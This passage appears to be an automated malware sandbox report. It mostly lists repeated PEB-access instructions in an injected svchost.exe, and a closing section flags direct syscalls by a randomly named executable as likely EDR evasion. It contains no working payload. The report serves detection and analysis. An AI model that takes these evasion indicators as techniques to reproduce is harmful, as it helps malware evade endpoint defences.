            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov ecx, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov ecx, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03BAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03BAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF903E mov eax, dword ptr fs:[00000030h]2_2_03BF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF903E mov eax, dword ptr fs:[00000030h]2_2_03BF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF903E mov eax, dword ptr fs:[00000030h]2_2_03BF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF903E mov eax, dword ptr fs:[00000030h]2_2_03BF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C05060 mov eax, dword ptr fs:[00000030h]2_2_03C05060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov ecx, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD070 mov ecx, dword ptr fs:[00000030h]2_2_03BAD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB106E mov eax, dword ptr fs:[00000030h]2_2_03BB106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD705E mov ebx, dword ptr fs:[00000030h]2_2_03BD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD705E mov eax, dword ptr fs:[00000030h]2_2_03BD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B052 mov eax, dword ptr fs:[00000030h]2_2_03B5B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5D7B0 mov eax, dword ptr fs:[00000030h]2_2_03B5D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB97A9 mov eax, dword ptr fs:[00000030h]2_2_03BB97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBF7AF mov eax, dword ptr fs:[00000030h]2_2_03BBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBF7AF mov eax, dword ptr fs:[00000030h]2_2_03BBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBF7AF mov eax, dword ptr fs:[00000030h]2_2_03BBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBF7AF mov eax, dword ptr fs:[00000030h]2_2_03BBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBF7AF mov eax, dword ptr fs:[00000030h]2_2_03BBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF78A mov eax, dword ptr fs:[00000030h]2_2_03BEF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3D7E0 mov ecx, dword ptr fs:[00000030h]2_2_03B3D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B357C0 mov eax, dword ptr fs:[00000030h]2_2_03B357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B357C0 mov eax, dword ptr fs:[00000030h]2_2_03B357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B357C0 mov eax, dword ptr fs:[00000030h]2_2_03B357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C037B6 mov eax, dword ptr fs:[00000030h]2_2_03C037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29730 mov eax, dword ptr fs:[00000030h]2_2_03B29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29730 mov eax, dword ptr fs:[00000030h]2_2_03B29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B65734 mov eax, dword ptr fs:[00000030h]2_2_03B65734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3973A mov eax, dword ptr fs:[00000030h]2_2_03B3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3973A mov eax, dword ptr fs:[00000030h]2_2_03B3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03749 mov eax, dword ptr fs:[00000030h]2_2_03C03749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF72E mov eax, dword ptr fs:[00000030h]2_2_03BEF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B33720 mov eax, dword ptr fs:[00000030h]2_2_03B33720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4F720 mov eax, dword ptr fs:[00000030h]2_2_03B4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4F720 mov eax, dword ptr fs:[00000030h]2_2_03B4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4F720 mov eax, dword ptr fs:[00000030h]2_2_03B4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF972B mov eax, dword ptr fs:[00000030h]2_2_03BF972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6F71F mov eax, dword ptr fs:[00000030h]2_2_03B6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6F71F mov eax, dword ptr fs:[00000030h]2_2_03B6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B37703 mov eax, dword ptr fs:[00000030h]2_2_03B37703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B35702 mov eax, dword ptr fs:[00000030h]2_2_03B35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B35702 mov eax, dword ptr fs:[00000030h]2_2_03B35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B765 mov eax, dword ptr fs:[00000030h]2_2_03B2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B765 mov eax, dword ptr fs:[00000030h]2_2_03B2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B765 mov eax, dword ptr fs:[00000030h]2_2_03B2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B765 mov eax, dword ptr fs:[00000030h]2_2_03B2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43740 mov eax, dword ptr fs:[00000030h]2_2_03B43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43740 mov eax, dword ptr fs:[00000030h]2_2_03B43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43740 mov eax, dword ptr fs:[00000030h]2_2_03B43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B73C mov eax, dword ptr fs:[00000030h]2_2_03C0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B73C mov eax, dword ptr fs:[00000030h]2_2_03C0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B73C mov eax, dword ptr fs:[00000030h]2_2_03C0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B73C mov eax, dword ptr fs:[00000030h]2_2_03C0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B276B2 mov eax, dword ptr fs:[00000030h]2_2_03B276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B276B2 mov eax, dword ptr fs:[00000030h]2_2_03B276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B276B2 mov eax, dword ptr fs:[00000030h]2_2_03B276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D6AA mov eax, dword ptr fs:[00000030h]2_2_03B2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D6AA mov eax, dword ptr fs:[00000030h]2_2_03B2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB368C mov eax, dword ptr fs:[00000030h]2_2_03BB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB368C mov eax, dword ptr fs:[00000030h]2_2_03BB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB368C mov eax, dword ptr fs:[00000030h]2_2_03BB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB368C mov eax, dword ptr fs:[00000030h]2_2_03BB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BED6F0 mov eax, dword ptr fs:[00000030h]2_2_03BED6F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC36EE mov eax, dword ptr fs:[00000030h]2_2_03BC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC36EE mov eax, dword ptr fs:[00000030h]2_2_03BC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC36EE mov eax, dword ptr fs:[00000030h]2_2_03BC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC36EE mov eax, dword ptr fs:[00000030h]2_2_03BC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC36EE mov eax, dword ptr fs:[00000030h]2_2_03BC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC36EE mov eax, dword ptr fs:[00000030h]2_2_03BC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5D6E0 mov eax, dword ptr fs:[00000030h]2_2_03B5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5D6E0 mov eax, dword ptr fs:[00000030h]2_2_03B5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B636EF mov eax, dword ptr fs:[00000030h]2_2_03B636EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03B3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03B3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03B3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03B3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03B3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03B3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC mov eax, dword ptr fs:[00000030h]2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC mov eax, dword ptr fs:[00000030h]2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC mov eax, dword ptr fs:[00000030h]2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC mov eax, dword ptr fs:[00000030h]2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF6C7 mov eax, dword ptr fs:[00000030h]2_2_03BEF6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B616CF mov eax, dword ptr fs:[00000030h]2_2_03B616CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F626 mov eax, dword ptr fs:[00000030h]2_2_03B2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F626 mov eax, dword ptr fs:[00000030h]2_2_03B2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F626 mov eax, dword ptr fs:[00000030h]2_2_03B2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F626 mov eax, dword ptr fs:[00000030h]2_2_03B2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F626 mov eax, dword ptr fs:[00000030h]2_2_03B2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F626 mov eax, dword ptr fs:[00000030h]2_2_03B2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F626 mov eax, dword ptr fs:[00000030h]2_2_03B2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F626 mov eax, dword ptr fs:[00000030h]2_2_03B2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F626 mov eax, dword ptr fs:[00000030h]2_2_03B2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B33616 mov eax, dword ptr fs:[00000030h]2_2_03B33616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B33616 mov eax, dword ptr fs:[00000030h]2_2_03B33616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B61607 mov eax, dword ptr fs:[00000030h]2_2_03B61607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6F603 mov eax, dword ptr fs:[00000030h]2_2_03B6F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
